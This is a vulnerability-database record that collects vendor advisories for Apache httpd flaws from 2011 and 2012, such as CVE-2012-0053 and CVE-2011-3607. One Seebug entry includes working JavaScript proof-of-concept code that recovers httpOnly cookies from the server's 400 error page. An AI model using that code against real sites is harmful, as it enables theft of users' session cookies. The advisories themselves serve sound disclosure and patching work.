configurations\nwhere mod_proxy was used in load balancer mode. A remote attacker could\ncause mod_proxy to not send requests to back-end AJP (Apache JServ\nProtocol) servers for the retry timeout period or until all back-end\nservers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. 
(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config\nmodule. In configurations where cookie logging is enabled, a remote\nattacker could use this flaw to crash the httpd child process via an HTTP\nrequest with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting the\nCVE-2011-3368 issue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update\nintroduced a regression in the way httpd handled certain Range HTTP header\nvalues. This update corrects this regression. 
(BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these\nupdated packages, which contain backported patches to correct these issues.\nAfter installing the updated packages, users must restart the httpd\nservice for the update to take effect.\n", "modified": "2018-06-07T02:42:41", "published": "2012-05-07T04:00:00", "id": "RHSA-2012:0542", "href": "https://access.redhat.com/errata/RHSA-2012:0542", "type": "redhat", "title": "(RHSA-2012:0542) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:55:26", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-02-01T00:00:00", "published": "2012-02-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30056", "id": "SSV:30056", "type": "seebug", "title": "Apache httpOnly Cookie Disclosure(CVE-2012-0053)", "sourceData": "\n // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08\r\n// Most browsers limit cookies to 4k characters, so we need multiple\r\nfunction setCookies (good) {\r\n // Construct string for cookie value\r\n var str = "";\r\n for (var i=0; i< 819; i++) {\r\n str += "x";\r\n }\r\n // Set cookies\r\n for (i = 0; i < 10; i++) {\r\n // Expire evil cookie\r\n if (good) {\r\n var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";\r\n }\r\n // Set evil cookie\r\n else {\r\n var cookie = "xss"+i+"="+str+";path=/";\r\n }\r\n document.cookie = cookie;\r\n }\r\n}\r\nfunction makeRequest() {\r\n setCookies();\r\n function parseCookies () {\r\n var cookie_dict = {};\r\n // Only react on 400 status\r\n if (xhr.readyState === 4 && xhr.status === 400) {\r\n // Replace newlines and match <pre> content\r\n var content = xhr.responseText.replace(/\\r|\\n/g,'').match(/<pre>(.+)<\\/pre>/);\r\n if (content.length) {\r\n // Remove Cookie: prefix\r\n content = 
content[1].replace("Cookie: ", "");\r\n var cookies = content.replace(/xss\\d=x+;?/g, '').split(/;/g);\r\n // Add cookies to object\r\n for (var i=0; i<cookies.length; i++) {\r\n var s_c = cookies[i].split('=',2);\r\n cookie_dict[s_c[0]] = s_c[1];\r\n }\r\n }\r\n // Unset malicious cookies\r\n setCookies(true);\r\n alert(JSON.stringify(cookie_dict));\r\n }\r\n }\r\n // Make XHR request\r\n var xhr = new XMLHttpRequest();\r\n xhr.onreadystatechange = parseCookies;\r\n xhr.open("GET", "/", true);\r\n xhr.send(null);\r\n}\r\nmakeRequest();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30056", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:58:42", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 50494\r\nCVE ID: CVE-2011-3607\r\n\r\nApache HTTP Server is an open-source web server from the Apache Software Foundation. It runs on most computer operating systems and, being widely used for its cross-platform support and security, is one of the most popular web server programs.\r\n\r\nApache HTTP Server has a local privilege escalation vulnerability in the implementation of the "ap_pregsub()" function; a local attacker could exploit it to execute arbitrary code with elevated privileges.\r\n\r\nTriggering this vulnerability requires mod_setenvif to be enabled and the attacker to be able to place a malicious .htaccess file on the affected server. The vulnerability stems from an integer overflow error in the "ap_pregsub()" function (server/utils.c); 
a specially crafted .htaccess file can cause a heap buffer overflow.\r\n\n\nApache HTTP Server 2.2.x\r\nApache HTTP Server 2.0.x\nVendor patch:\r\n\r\nApache Group\r\n------------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:\r\n\r\nhttp://httpd.apache.org/", "modified": "2011-11-04T00:00:00", "published": "2011-11-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-23169", "id": "SSV:23169", "title": "Apache HTTP Server "ap_pregsub()" Function Local Privilege Escalation Vulnerability", "type": "seebug", "sourceData": "", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:55:46", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 51407\r\nCVE ID: CVE-2012-0031\r\n\r\nApache HTTP Server is an open-source web server from the Apache Software Foundation. It runs on most computer operating systems and, being widely used for its cross-platform support and security, is one of the most popular web server programs.\r\n\r\nA child process of Apache HTTP Server can modify the type records in the scoreboard shared memory segment. This can be exploited to cause an invalid free operation in the parent process during shutdown, allowing a local attacker to bypass certain security restrictions.\n0\nApache 2.2.x\nVendor patch:\r\n\r\nApache 
Group\r\n------------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:\r\n\r\nhttp://www.apache.org", "modified": "2012-01-17T00:00:00", "published": "2012-01-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30024", "id": "SSV:30024", "type": "seebug", "title": "Apache 2.2.x Scoreboard Local Security Restriction Bypass Vulnerability", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:12", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2405-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nFebruary 06, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : multiple issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-3607 CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 \n CVE-2012-0031 CVE-2012-0053 \n\nSeveral vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\n An integer overflow in ap_pregsub() could allow local attackers to\n execute arbitrary code at elevated privileges via crafted .htaccess\n files.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\n The Apache HTTP Server did not properly validate the request URI for\n proxied requests. In certain reverse proxy configurations using the\n ProxyPassMatch directive or using the RewriteRule directive with the\n [P] flag, a remote attacker could make the proxy connect to an\n arbitrary server. 
This could allow the attacker to access internal\n servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append arbitrary\n strings to the host or port parts of the target URI. For example, the\n configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations:\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1\n ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\n An apache2 child process could cause the parent process to crash\n during shutdown. This is a violation of the privilege separation\n between the apache2 processes and could potentially be used to worsen\n the impact of other vulnerabilities.\n\nCVE-2012-0053:\n\n The response message for error code 400 (bad request) could be used to\n expose "httpOnly" cookies. This could allow a remote attacker using\n cross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6.\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. 
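The ProxyPassMatch caveat in the DSA is easiest to see by splicing the captured group into the target URL and then parsing the result the way a URL parser would. The following Python script is an added illustration, not part of the Debian advisory or of httpd: it simulates the `$1` substitution with Python's `re` (httpd uses PCRE, but the three DSA patterns behave identically) and uses `urllib.parse` to report which backend host and port the proxy would actually contact. The request paths and the `evil.example` host are constructed for the demonstration; only `$1` is supported, which is all the DSA examples use.

```python
import re
from urllib.parse import urlsplit

# ProxyPassMatch rules quoted in DSA-2405-1: the first is the insecure one,
# the other two are the recommended replacements.
RULES = {
    "insecure":    (r"^/mail(.*)",  "http://internal-host$1"),
    "fixed_slash": (r"^/mail(/.*)", "http://internal-host$1"),
    "fixed_dir":   (r"^/mail/(.*)", "http://internal-host/$1"),
}

# Constructed request paths: one benign, two that try to continue into the
# authority (userinfo / host / port) part of the target URL.
REQUEST_PATHS = [
    "/mail/inbox",
    "/mail@evil.example/",
    "/mail:8443/",
]


def expand_target(pattern: str, template: str, path: str):
    """Apply one ProxyPassMatch rule to a request path.

    Returns the target URL the proxy would use, or None when the pattern does
    not match (httpd then moves on to the next rule or serves the request
    locally). Only the $1 back-reference is handled.
    """
    m = re.match(pattern, path)
    if m is None:
        return None
    return template.replace("$1", m.group(1))


def backend_for(pattern: str, template: str, path: str):
    """Return (hostname, port) of the backend the proxy would contact, or None."""
    target = expand_target(pattern, template, path)
    if target is None:
        return None
    parts = urlsplit(target)
    # urlsplit treats 'internal-host@evil.example' as userinfo@host, exactly
    # as the proxy's URL parser does: the connection goes to evil.example.
    return parts.hostname, parts.port


def audit(rules=RULES, paths=REQUEST_PATHS, expected_host="internal-host"):
    """Map each rule name to the request paths that would leave the intended backend.

    A path is flagged when the parsed host differs from expected_host or when
    the client managed to inject an explicit port.
    """
    findings = {}
    for name, (pattern, template) in rules.items():
        bad = []
        for path in paths:
            backend = backend_for(pattern, template, path)
            if backend is None:
                continue
            host, port = backend
            if host != expected_host or port is not None:
                bad.append(path)
        findings[name] = bad
    return findings


if __name__ == "__main__":
    for name, (pattern, template) in RULES.items():
        print(f"{name}: ProxyPassMatch {pattern} {template}")
        for path in REQUEST_PATHS:
            print(f"  {path:22} -> {expand_target(pattern, template, path)!r}"
                  f"  backend={backend_for(pattern, template, path)}")
    print("paths reaching an unexpected backend:", audit())
```

To audit a real configuration, put your own pattern/template pairs into `RULES`; any rule for which `audit()` returns a non-empty list lets a client choose the host or port, which is exactly the condition the DSA says the administrator must rule out even after patching.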
In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-02-06T09:24:08", "published": "2012-02-06T09:24:08", "id": "DEBIAN:DSA-2405-1:AE657", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00031.html", "title": "[SECURITY] [DSA 2405-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:54", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0128\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. 
An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0128.html", "modified": "2012-02-14T06:13:29", "published": "2012-02-14T06:13:29", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html", "id": "CESA-2012:0128", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:24", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nIt was discovered that the fix for [CVE-2011-3368 __](<https://access.redhat.com/security/cve/CVE-2011-3368>) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially-crafted URI. 
([CVE-2011-3639 __](<https://access.redhat.com/security/cve/CVE-2011-3639>), [CVE-2011-4317 __](<https://access.redhat.com/security/cve/CVE-2011-4317>))\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies. ([CVE-2012-0053 __](<https://access.redhat.com/security/cve/CVE-2012-0053>))\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions. An attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a \".htaccess\" file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2011-3607 __](<https://access.redhat.com/security/cve/CVE-2011-3607>))\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown. 
([CVE-2012-0031 __](<https://access.redhat.com/security/cve/CVE-2012-0031>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-debuginfo-2.2.22-1.23.amzn1.i686 \n mod_ssl-2.2.22-1.23.amzn1.i686 \n httpd-devel-2.2.22-1.23.amzn1.i686 \n httpd-2.2.22-1.23.amzn1.i686 \n httpd-tools-2.2.22-1.23.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.22-1.23.amzn1.noarch \n \n src: \n httpd-2.2.22-1.23.amzn1.src \n \n x86_64: \n httpd-2.2.22-1.23.amzn1.x86_64 \n httpd-devel-2.2.22-1.23.amzn1.x86_64 \n httpd-debuginfo-2.2.22-1.23.amzn1.x86_64 \n mod_ssl-2.2.22-1.23.amzn1.x86_64 \n httpd-tools-2.2.22-1.23.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T15:21:00", "published": "2014-09-14T15:21:00", "id": "ALAS-2012-046", "href": "https://alas.aws.amazon.com/ALAS-2012-46.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:23", "bulletinFamily": "unix", "description": "It was discovered that the Apache HTTP Server incorrectly handled the SetEnvIf .htaccess file directive. An attacker having write access to a .htaccess file may exploit this to possibly execute arbitrary code. (CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly interact with the RewriteRule and ProxyPassMatch pattern matches in the configuration of a reverse proxy. This could allow remote attackers to contact internal webservers behind the proxy that were not intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly handled a certain format string when used with a threaded MPM. A remote attacker could exploit this to cause a denial of service via a specially- crafted cookie. This issue only affected Ubuntu 11.04 and 11.10. 
(CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled certain type fields within a scoreboard shared memory segment. A local attacker could exploit this to cause a denial of service. (CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrectly handled header information when returning a Bad Request (400) error page. A remote attacker could exploit this to obtain the values of certain HTTPOnly cookies. (CVE-2012-0053)", "modified": "2012-02-16T00:00:00", "published": "2012-02-16T00:00:00", "id": "USN-1368-1", "href": "https://usn.ubuntu.com/1368-1/", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:10", "bulletinFamily": "unix", "description": "\nCVE MITRE reports:\n\nAn exposure was found when using mod_proxy in reverse proxy\n\t mode. In certain configurations using RewriteRule with proxy\n\t flag or ProxyPassMatch, a remote attacker could cause the reverse\n\t proxy to connect to an arbitrary server, possibly disclosing\n\t sensitive information from internal web servers not directly\n\t accessible to the attacker.\nInteger overflow in the ap_pregsub function in server/util.c in\n\t the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through\n\t 2.2.21, when the mod_setenvif module is enabled, allows local\n\t users to gain privileges via a .htaccess file with a crafted\n\t SetEnvIf directive, in conjunction with a crafted HTTP request\n\t header, leading to a heap-based buffer overflow.\nAn additional exposure was found when using mod_proxy in\n\t reverse proxy mode. 
In certain configurations using RewriteRule\n\t with proxy flag or ProxyPassMatch, a remote attacker could cause\n\t the reverse proxy to connect to an arbitrary server, possibly\n\t disclosing sensitive information from internal web servers\n\t not directly accessible to the attacker.\nA flaw was found in mod_log_config. If the '%{cookiename}C' log\n\t format string is in use, a remote attacker could send a specific\n\t cookie causing a crash. This crash would only be a denial of\n\t service if using a threaded MPM.\nA flaw was found in the handling of the scoreboard. An\n\t unprivileged child process could cause the parent process to\n\t crash at shutdown rather than terminate cleanly.\nA flaw was found in the default error response for status code\n\t 400. This flaw could be used by an attacker to expose\n\t \"httpOnly\" cookies when no custom ErrorDocument is specified.\n\n", "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "href": "https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html", "title": "apache -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "description": "Information leakage, filtering bypass, privilege escalation, DoS.", "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:VULN:12166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12166", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": " Apache HTTP Server 2.2.22 Released\r\n\r\n The Apache Software Foundation and the Apache HTTP Server Project are\r\n pleased to announce the release of 
version 2.2.22 of the Apache HTTP\r\n Server ("Apache"). This version of Apache is principally a security\r\n and bug fix release, including the following significant security fixes:\r\n\r\n * SECURITY: CVE-2011-3368 (cve.mitre.org)\r\n Reject requests where the request-URI does not match the HTTP\r\n specification, preventing unexpected expansion of target URLs in\r\n some reverse proxy configurations.\r\n\r\n * SECURITY: CVE-2011-3607 (cve.mitre.org)\r\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\r\n is enabled, could allow local users to gain privileges via a .htaccess\r\n file.\r\n\r\n * SECURITY: CVE-2011-4317 (cve.mitre.org)\r\n Resolve additional cases of URL rewriting with ProxyPassMatch or\r\n RewriteRule, where particular request-URIs could result in undesired\r\n backend network exposure in some configurations.\r\n\r\n * SECURITY: CVE-2012-0021 (cve.mitre.org)\r\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\r\n string is in use and a client sends a nameless, valueless cookie, causing\r\n a denial of service. 
The issue existed since version 2.2.17.\r\n\r\n * SECURITY: CVE-2012-0031 (cve.mitre.org)\r\n Fix scoreboard issue in which an unprivileged child process\r\n could cause the parent to crash at shutdown rather than terminate\r\n cleanly.\r\n\r\n * SECURITY: CVE-2012-0053 (cve.mitre.org)\r\n Fixed an issue in error responses that could expose "httpOnly" cookies\r\n when no custom ErrorDocument is specified for status code 400.\r\n\r\n The Apache HTTP Project thanks halfdog, Context Information Security Ltd,\r\n Prutha Parikh of Qualys, and Norman Hippert for bringing these issues to\r\n the attention of the security team.\r\n\r\n We consider this release to be the best version of Apache available, and\r\n encourage users of all prior versions to upgrade.\r\n\r\n Apache HTTP Server 2.2.22 is available for download from:\r\n\r\n http://httpd.apache.org/download.cgi\r\n\r\n Please see the CHANGES_2.2 file, linked from the download page, for a\r\n full list of changes. A condensed list, CHANGES_2.2.22, includes only\r\n those changes introduced since the prior 2.2 release. A summary of all\r\n of the security vulnerabilities addressed in this and earlier releases\r\n is available:\r\n\r\n http://httpd.apache.org/security/vulnerabilities_22.html\r\n\r\n This release includes the Apache Portable Runtime (APR) version 1.4.5\r\n and APR Utility Library (APR-util) version 1.4.2, bundled with the tar\r\n and zip distributions. The APR libraries libapr and libaprutil (and\r\n on Win32, libapriconv version 1.2.1) must all be updated to ensure\r\n binary compatibility and address many known security and platform bugs.\r\n APR-util version 1.4 represents a minor version upgrade from earlier\r\n httpd source distributions, which previously included version 1.3.\r\n\r\n Apache 2.2 offers numerous enhancements, improvements, and performance\r\n boosts over the 2.0 codebase. 
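The CVE-2012-0053 entry above (and the Ubuntu, FreeBSD, SUSE and CentOS texts) all describe the same mechanism: a pre-2.2.22 httpd with no custom ErrorDocument for status 400 echoed the offending request header line back in the error page, so script running in the site's origin could make the browser send an oversized Cookie header and then read the HttpOnly cookies out of the response body. The Python below is an added example, not code from any of the advisories or from httpd. It builds the probe request (a Cookie header longer than httpd's default LimitRequestFieldSize of 8190 bytes) and detects a reflected header in a 400 body. The sample bodies are constructed for the demonstration to mirror the shape of the default 400 page before and after the fix; the cookie names, `www.example.com` and the `<pre>`-block layout are assumptions of this example.

```python
import html
import re

# httpd's default LimitRequestFieldSize; a single header field longer than
# this is answered with 400 Bad Request.
DEFAULT_FIELD_LIMIT = 8190


def build_probe(host: str, path: str = "/", field_limit: int = DEFAULT_FIELD_LIMIT) -> bytes:
    """Build a raw HTTP/1.1 request whose Cookie header exceeds the field limit.

    In the browser the same effect is reached by writing large values into
    document.cookie; here the oversized cookie is added directly so the probe
    can be sent over a plain socket.
    """
    padding = "A" * (field_limit + 1)
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: probe={padding}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


# The vulnerable page put the rejected header line inside <pre> ... </pre>.
_PRE_BLOCK = re.compile(r"<pre>\s*(.*?)\s*</pre>", re.DOTALL | re.IGNORECASE)


def reflected_cookie_names(error_body: str):
    """Return the cookie names echoed back in a 400 page, [] if none is reflected."""
    names = []
    for block in _PRE_BLOCK.findall(error_body):
        line = html.unescape(block)
        if not line.lower().startswith("cookie:"):
            continue
        for pair in line[len("cookie:"):].split(";"):
            name = pair.split("=", 1)[0].strip()
            if name:
                names.append(name)
    return names


def leaks_httponly(error_body: str, httponly_names) -> bool:
    """True if any cookie the browser marks HttpOnly shows up in the error page."""
    wanted = set(httponly_names)
    return any(name in wanted for name in reflected_cookie_names(error_body))


# Constructed sample: the default 400 page of a vulnerable httpd 2.2.x, with a
# made-up session cookie next to the oversized probe cookie.
VULNERABLE_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>400 Bad Request</title>\n</head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: session=2f1c9e; prefs=dark; probe=" + "A" * 40 + "\n</pre>\n"
    "</p>\n</body></html>\n"
)

# Constructed sample: the same page from a fixed server, header line omitted.
FIXED_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>400 Bad Request</title>\n</head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "</p>\n</body></html>\n"
)

if __name__ == "__main__":
    print(build_probe("www.example.com")[:64], b"...")
    print("vulnerable page reflects:", reflected_cookie_names(VULNERABLE_BODY))
    print("fixed page reflects:     ", reflected_cookie_names(FIXED_BODY))
    print("HttpOnly 'session' leaked:", leaks_httponly(VULNERABLE_BODY, ["session"]))
```

Against a live server, send `build_probe(host)` over a socket, read the response and pass the body to `reflected_cookie_names()`; a non-empty list from a 400 page means the header is being echoed. Because the advisories tie the leak to the absence of a custom ErrorDocument, configuring `ErrorDocument 400` with a static page removes the echo on an unpatched server, but the release notes above make upgrading to 2.2.22 (or the vendor's backported package) the actual fix.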
For an overview of new features\r\n introduced since 2.0 please see:\r\n\r\n http://httpd.apache.org/docs/2.2/new_features_2_2.html\r\n\r\n This release builds on and extends the Apache 2.0 API. Modules written\r\n for Apache 2.0 will need to be recompiled in order to run with Apache\r\n 2.2, and require minimal or no source code changes.\r\n\r\n http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING\r\n\r\n When upgrading or installing this version of Apache, please bear in mind\r\n that if you intend to use Apache with one of the threaded MPMs (other\r\n than the Prefork MPM), you must ensure that any modules you will be\r\n using (and the libraries they depend on) are thread-safe.\r\n", "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:DOC:27611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27611", "title": "[Announce] Apache HTTP Server 2.2.22 Released", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "description": "Privilege escalation with SetEnvIf in conjunction with crafted HTTP headers.", "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "SECURITYVULNS:VULN:12139", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12139", "title": "Apache privilege escalation", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:55", "bulletinFamily": "unix", "description": "New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. 
The apr-util package has also been\nupdated to the latest version.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded.\n Version bump for httpd upgrade.\npatches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded.\n *) SECURITY: CVE-2011-3368 (cve.mitre.org)\n Reject requests where the request-URI does not match the HTTP\n specification, preventing unexpected expansion of target URLs in\n some reverse proxy configurations. [Joe Orton]\n *) SECURITY: CVE-2011-3607 (cve.mitre.org)\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\n is enabled, could allow local users to gain privileges via a .htaccess\n file. [Stefan Fritsch, Greg Ames]\n *) SECURITY: CVE-2011-4317 (cve.mitre.org)\n Resolve additional cases of URL rewriting with ProxyPassMatch or\n RewriteRule, where particular request-URIs could result in undesired\n backend network exposure in some configurations.\n [Joe Orton]\n *) SECURITY: CVE-2012-0021 (cve.mitre.org)\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\n string is in use and a client sends a nameless, valueless cookie, causing\n a denial of service. The issue existed since version 2.2.17. PR 52256.\n [Rainer Canavan <rainer-apache 7val com>]\n *) SECURITY: CVE-2012-0031 (cve.mitre.org)\n Fix scoreboard issue in which an unprivileged child process\n could cause the parent to crash at shutdown rather than terminate\n cleanly. 
